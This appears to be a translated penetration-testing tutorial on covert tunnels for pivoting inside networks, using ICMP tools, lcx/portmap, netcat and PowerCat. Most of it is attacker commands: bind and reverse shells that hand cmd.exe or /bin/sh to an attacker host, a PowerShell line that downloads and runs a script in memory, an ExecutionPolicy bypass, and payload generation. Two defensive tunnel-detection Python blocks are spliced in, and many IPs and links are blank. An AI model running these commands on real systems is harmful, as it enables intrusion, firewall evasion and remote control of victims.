Penetration tests (Intranet): hidden communication tunnel technology (part 1)

What is a tunnel?
In real networks, border devices, software/hardware firewalls and even intrusion detection systems are usually used to inspect external connections. If an abnormality is found, the communication is blocked. So what is a tunnel? A tunnel here is a communication method that bypasses port blocking. The data packets at both ends of the firewall are encapsulated in packet types or ports that the firewall allows, and then pass through the firewall to communicate with each other. When an encapsulated packet reaches its destination, it is restored and the restored packet is sent to the corresponding server.

There are three commonly used tunneling technologies:

Network layer: IPv6 tunnel, ICMP tunnel

Transport layer: TCP tunnel, UDP tunnel, conventional port forwarding

Application layer: SSH tunnel, HTTP/S tunnel, DNS tunnel

First determine intranet connectivity
Determining intranet connectivity means determining whether the machine can reach the external network, and so on (a combined judgment across several protocols). The method for each protocol is as follows:

1. TCP protocol

Use netcat, the “Swiss Army knife”.

Execute the nc command: nc <IP> <port>.

2. HTTP protocol

Use the “curl” tool and execute the curl <IP address>:<port> command. If the remote host has the corresponding port open and the internal network can connect to the external network, the corresponding port information is output.

3. ICMP protocol

Use the “ping” command to execute ping <IP address/domain name>.

4. DNS protocol

Commonly used commands to check DNS connectivity are “nslookup” and “dig”.

nslookup is the DNS lookup command that comes with Windows. Execute:

  nslookup vps-ip
  nslookup        // If no server is specified, the default DNS server is used

dig is the DNS lookup command that comes with Linux systems. Execute:

  dig @vps-ip
  dig             // If no server is specified, the default DNS server is used

Network layer tunneling technology
IPv6 tunnel
IPv6 tunnel technology refers to transmitting IPv6 data packets through an IPv4 tunnel. To carry IPv6 information across the IPv4 ocean, IPv4 can be used as the tunnel carrier and IPv6 packets can be encapsulated in IPv4 data packets. The IPv6 packets can then cross the IPv4 ocean and reach another IPv6 island.

The process of encapsulating IPv6 in IPv4 is similar to the encapsulation of other protocols: the node at one end of the tunnel places the IPv6 datagram as payload in an IPv4 packet sent to the node at the other end of the tunnel, producing an IPv4 datagram flow that contains IPv6 datagrams. If node A and node B both support only IPv6 and node A wants to send a packet to B, A simply sets the destination address of the IPv6 header to B’s IPv6 address and passes the packet to router X. X encapsulates the IPv6 packet in IPv4 and sets the destination address of the IPv4 header to the IPv4 address of router Y. When router Y receives this IPv4 packet, it first unpacks it; if it finds that the encapsulated IPv6 packet is addressed to node B, Y forwards the packet to B.

At this stage, border devices, firewalls and even intrusion prevention systems still cannot identify IPv6 communication data, while most operating systems support IPv6; it only needs to be configured manually.

Attackers sometimes use malware to configure devices so that they allow IPv6 communication, in order to evade firewalls and intrusion detection systems.
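For defenders, the encapsulation described above is visible on the wire as IPv4 protocol number 41. The following is an added example, not code from the original article: it parses raw IPv4 packets, extracts the inner IPv6 addresses and flags IPv6-in-IPv4 traffic whose endpoints are not approved tunnel routers. The addresses, the allow-list and the function names are assumptions chosen for illustration.

```python
import ipaddress
import struct

IPPROTO_IPV6 = 41  # IANA protocol number: IPv6 encapsulated in IPv4

def build_6in4(x4, y4, a6, b6, payload=b""):
    """Constructed sample: the packet router X would send to router Y."""
    inner = struct.pack("!IHBB", 6 << 28, len(payload), 59, 64)  # 59 = no next header
    inner += ipaddress.IPv6Address(a6).packed + ipaddress.IPv6Address(b6).packed + payload
    # The outer header checksum is left at 0; this inspector does not verify it.
    outer = struct.pack("!BBHHHBBH", 0x45, 0, 20 + len(inner), 0, 0, 64, IPPROTO_IPV6, 0)
    outer += ipaddress.IPv4Address(x4).packed + ipaddress.IPv4Address(y4).packed
    return outer + inner

def inspect_ipv4(packet):
    """Return tunnel endpoints and inner addresses, or None if not IPv6-in-IPv4."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4            # outer header length, options included
    if ihl < 20 or packet[9] != IPPROTO_IPV6:
        return None
    inner = packet[ihl:]
    if len(inner) < 40 or inner[0] >> 4 != 6:
        return None                          # protocol 41 without a valid IPv6 header
    return {
        "tunnel_src": str(ipaddress.IPv4Address(packet[12:16])),
        "tunnel_dst": str(ipaddress.IPv4Address(packet[16:20])),
        "inner_src": str(ipaddress.IPv6Address(inner[8:24])),
        "inner_dst": str(ipaddress.IPv6Address(inner[24:40])),
    }

def unexpected_tunnels(packets, allowed_endpoints):
    """Flag 6in4 packets whose IPv4 endpoints are not both approved routers."""
    hits = []
    for pkt in packets:
        info = inspect_ipv4(pkt)
        if info and not {info["tunnel_src"], info["tunnel_dst"]} <= allowed_endpoints:
            hits.append(info)
    return hits

# Constructed sample traffic using documentation address ranges (assumption).
ALLOWED = {"192.0.2.1", "198.51.100.1"}      # routers X and Y
SAMPLE = [
    build_6in4("192.0.2.1", "198.51.100.1", "2001:db8:a::1", "2001:db8:b::1"),
    build_6in4("192.0.2.77", "203.0.113.9", "2001:db8:a::77", "2001:db8:f::9"),
]
print(unexpected_tunnels(SAMPLE, ALLOWED))
```

Only the second sample packet is reported, because a workstation rather than an approved router is acting as the tunnel endpoint.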

Configured tunnels and automatic tunnels

The main difference between a configured tunnel and an automatic tunnel is that an automatic tunnel is only feasible when the IPv6 address of the node performing the tunnel function is an IPv4-compatible address. With the automatic tunnel method, no configuration is needed to establish an IP address for the node that performs the tunnel function; the configured tunnel method requires the tunnel end node to obtain its IPv4 address through other mechanisms, such as DHCP, manual configuration or other IPv4 configuration mechanisms.

Tunnel tools that support IPv6 include socat, 6tunnel, nt6tunnel, and so on.

ICMP tunnel
With the ICMP protocol, the two communicating devices do not need to open a port, whereas ordinary communication protocols require an open port. The most common ICMP message is the reply to the ping command. An attacker can use the command line to obtain more ICMP requests than replies.

In some network environments, when an attacker’s attempts with various upper-layer tunnels (such as HTTP tunnels, DNS tunnels, conventional port forwarding, etc.) all fail, they often try to establish an ICMP tunnel by pinging the remote host, because the firewall will not block ping packets. TCP/UDP data is encapsulated in ICMP ping packets so that it passes through the firewall and achieves unrestricted network access.
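Because a genuine echo reply must return exactly the data carried by the request, and ordinary ping payloads are small, tunnelled data stands out in captured ICMP traffic. The following is an added example, not code from the original article: it validates ICMP echo messages and reports oversized payloads and replies whose payload differs from the matching request. The 64-byte baseline, the sample messages and the function names are assumptions.

```python
import struct

MAX_PING_PAYLOAD = 64  # assumed baseline; common ping defaults are 32 or 56 bytes

def checksum(data):
    """RFC 1071 Internet checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(icmp_type, ident, seq, payload):
    """Constructed sample message: type 8 = echo request, type 0 = echo reply."""
    head = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return struct.pack("!BBHHH", icmp_type, 0, checksum(head + payload), ident, seq) + payload

def parse_echo(msg):
    """Return (type, ident, seq, payload) for a valid echo message, else None."""
    if len(msg) < 8 or checksum(msg) != 0:
        return None
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", msg[:8])
    if icmp_type not in (0, 8) or code != 0:
        return None
    return icmp_type, ident, seq, msg[8:]

def find_tunnel_indicators(messages):
    """Flag oversized payloads and replies that do not echo the request payload."""
    pending, alerts = {}, []
    for msg in messages:
        parsed = parse_echo(msg)
        if parsed is None:
            continue
        icmp_type, ident, seq, payload = parsed
        if len(payload) > MAX_PING_PAYLOAD:
            alerts.append(("oversized_payload", ident, seq))
        if icmp_type == 8:
            pending[(ident, seq)] = payload
        elif pending.pop((ident, seq), payload) != payload:
            alerts.append(("reply_payload_mismatch", ident, seq))
    return alerts

# Constructed sample: one ordinary ping exchange, then a request/reply pair carrying data.
PING = bytes(range(56))
SAMPLE = [build_echo(8, 1, 1, PING), build_echo(0, 1, 1, PING),
          build_echo(8, 7, 1, b"A" * 10), build_echo(0, 7, 1, b"B" * 100)]
print(find_tunnel_indicators(SAMPLE))
```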

Let me introduce the commonly used ICMP tunnel tools.


The icmpsh tool is a simple ICMP reverse shell tool. It is cross-platform and does not require administrator rights to run.

Download link:

To run it, you need to install Python’s impacket library, which provides access to protocols such as TCP, UDP, ICMP, IGMP, ARP, IPv4, IPv6 and SMB.

When icmpsh is running, it takes over the system’s own response to the ping command, so you need to execute the following command to turn off the local system’s ICMP responses; otherwise the shell obtained is unstable:

sysctl -w net.ipv4.icmp_echo_ignore_all=1    # set back to 0 afterwards to restore ICMP replies

Actual combat:

The attacker vps simulated public IP:

The victim simulated public IP:

The attacker enters in the project directory on the server side:

  python
  python Attacker ip victim ip

Or enter ./ to run the program; it then prompts you to enter the victim’s public network IP and gives you the command to execute on the victim’s host.

Upload icmpsh.exe to the victim host and execute the command:

icmpsh.exe -t -d 500 -b 30 -s 128

You can see the victim’s shell on the attacking machine:

icmpsh.exe parameters:

  -t  Host IP address to send ping requests to. This option is mandatory!
  -r  Send a single test ICMP request containing the string, and then exit. This is for testing the connection.
  -d  Delay between requests, in milliseconds
  -o  Response timeout, in milliseconds. If a reply is not received in time, the slave increments a blanks counter. If the counter reaches the limit, the slave exits. If a response is received, the counter is set back to 0
  -b  Limit on blanks (ICMP requests that have gone unanswered) before quitting
  -s  Maximum data buffer size, in bytes

In an actual penetration test, how do we know the public network IP of the victim machine? Strictly speaking, this IP should be the IP seen by the server. To get it, ping the VPS from the internal network terminal, use the tcpdump icmp or tcpdump -i eth0 icmp command to capture the traffic and obtain this IP, and then fill it in.


Pingtunnel is also a commonly used ICMP tunnel tool and is cross-platform. When using it, you can set a password for the tunnel to prevent the tunnel from being abused.

Download link:

Let’s do a test. The test environment is as follows:

  Attacker VPS
    Simulated public network IP:
  Web server
    Simulated public network IP:
    Intranet IP:
  Database server
    Intranet IP:

Suppose we have obtained privileges on the web server and want to continue into the intranet, but the attacker cannot access the database server located on the intranet. The web server cannot directly access the database server either, but it can reach it with the ping command. We can then use the web server as a springboard and establish an ICMP tunnel to penetrate the intranet.

First upload the ptunnel program on the victim web server and execute it:

ptunnel -x whoami

The attacker executes on vps:

ptunnel -p -lp 1080 -da -dp 3389 -x whoami

The meaning of the above command is: when port 1080 of the attacker’s VPS is accessed, the data of port 3389 of the database server is encapsulated in the ICMP tunnel and transmitted with the web server as the ICMP tunnel springboard. Throughout the process, the web server is the border server and acts as a springboard for data forwarding.

Finally, access the local 1080 port on the attacker’s vps to establish a connection with the 3389 port of the database server:

Parameters of ptunnel:

  -x:  Specify the password for the ICMP tunnel connection
  -lp: Specify the local TCP port that the attacker wants to listen on
  -da: Specify the IP address of the third-party target machine to be forwarded to
  -dp: Specify the TCP port of the third-party target to be forwarded to
  -p:  Specify the IP address of the machine at the other end of the ICMP tunnel

ptunnel -p -lp 1080 -da -dp 22 -x whoami

ssh administrator@ -p 1080

It is also possible to forward port 80 of the web service on the intranet target server to the attacker’s local machine:

ptunnel -p -lp 8000 -da -dp 80 -x whoami

  1. echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all #Disable icmp reply
  2. ./icmptunnel -s #monitor
  3. Reopen a command line window
  4. ifconfig tun0 netmask #Add the tun0 network card and assign the tunnel address to

Victim machine (client):
  1. echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all #Disable icmp reply
  2. ./icmptunnel #Connect to the server
  3. Reopen a command line window
  4. ifconfig tun0 netmask #Add tun0 network card, assign tunnel address
In this way, the client and server have opened an ICMP tunnel. The server side is and the client side is On the server, try to connect to the client via SSH. Note that you need to use the tunnel IP address for the SSH connection:
The client connects to the server:

Transport layer tunneling technology
In a penetration test, if the intranet firewall blocks access to a specified port, then after obtaining privileges on the target machine you can use the firewall command to open the specified port or turn off the firewall. If the intranet has a series of defense systems, TCP and UDP traffic will be intercepted in large quantities.

lcx port forwarding
lcx is a classic port forwarding tool based on sockets. It has two versions: lcx.exe for Windows and portmap for Linux.

Download link:

A normal socket must have two ends: one end is the server, which listens on a port and waits for clients to connect; the other end is the client, which establishes a connection by giving the server’s IP and port.

Intranet port forwarding

Execute the following command on the victim machine (Windows) to forward the data of port 3389 of the victim machine to port 8000 of the attacker’s public network VPS (Windows).

 lcx.exe -slave <Attacker ip> 8000 3389

Execute the following command on the attacking machine to forward the data received on port 8000 of the local machine to port 4444 of the local machine.

lcx.exe -listen 8000 4444

Now you can log in. Use remote desktop to connect to <attacker’s local ip>:4444 and you reach the victim’s remote desktop on port 3389.

Use portmap on Linux system:

First execute on the attacking machine with public network ip:

  ./portmap -m 2 -p1 23 -h2 -p2 2333

  ./portmap -m 2 -p1 23 -h2 <public network host ip> -p2 2333

This listens for requests on port 23 and forwards them to port 2333.

The -m parameter selects the mode in which the tool is used. There are three modes:

  1. Listen on port1 and connect to port2 of host2.
  2. Listen on port1 and port2.
  3. Connect to the port on host1 and the port on host2.

  ./portmap -m 3 -h1 -p1 22 -h2 -p2 23
  ./portmap -m 3 -h1 -p1 22 -h2 <public network host ip> -p2 23

Then the attacker can connect locally with the ssh command:

Local port forwarding

If the target server cannot pass the data of some ports (such as 3389, 22) due to firewall restrictions, we can forward the data of the corresponding port of the target server to the ports allowed by other firewalls. Execute the following commands on the victim machine to transparently transmit the target port 3389 to port 1080 of the target machine:

lcx.exe -tran 1080 3389

netcat: the Swiss Army knife
Download link:

Use nc to get shell

(1) Forward shell


  nc -ldp 4444 -e /bin/sh                        // Linux
  nc -ldp 4444 -e c:\windows\system32\cmd.exe    // Windows

The whole process is: first connect the web server to the attacker, and then connect to the database server located on the intranet at the moment of connection. The web server is the border server and is only used as a communication relay.


PowerCat is a PowerShell version of nc and works in a similar way. It can be uploaded to the target machine and executed locally, or downloaded to the target machine and executed in memory.

Download link:

Use PowerCat as a springboard:

The test environment is as follows:

  Attacker VPS
    Simulated public network IP:
  Windows 7
    Simulated public network IP:
    Intranet IP:
  Windows Server 8
    Intranet IP:

powershell -ExecutionPolicy bypass -Command "&{Import-Module C:\powercat.ps1;powercat -l -v -p 9999 -e c:\windows\system32\cmd.exe}"

Then execute the following command on Windows 7:

  powershell -ExecutionPolicy bypass IEX(New-Object Net.WebClient).DownloadString("");powercat -l -v -p 8000 -r tcp:
  // -r: data forwarding (relay)

nc -vv 8000

You can get the Windows Server 8 shell on the attacker’s host:

Here the forward shell is restricted by the firewall and does not succeed. You can use a command to turn off the firewall of the victim machine.

Reverse shell:

Attack host

nc -l -p 8888 -vv

Victim host

powercat -c <attacker IP> -p <attacker port> -e C:\windows\system32\cmd.exe

Reverse PowerShell session:

If you want a reverse PowerShell session, you must use powercat at both ends.

Attack host

powercat -l -v -p 4444 

Victim host

  powercat -c <attacker IP> -p <attacker port> -v -ep
  // -ep: return a PowerShell session

Generate payload with PowerCat

  Forward:
  powercat -l -p 4444 -e c:\windows\system32\cmd.exe -v -g >> shell.ps1
  Reverse:
  powercat -c <attacker IP> -p <attacker port> -v -e c:\windows\system32\cmd.exe -g >> shell.ps1

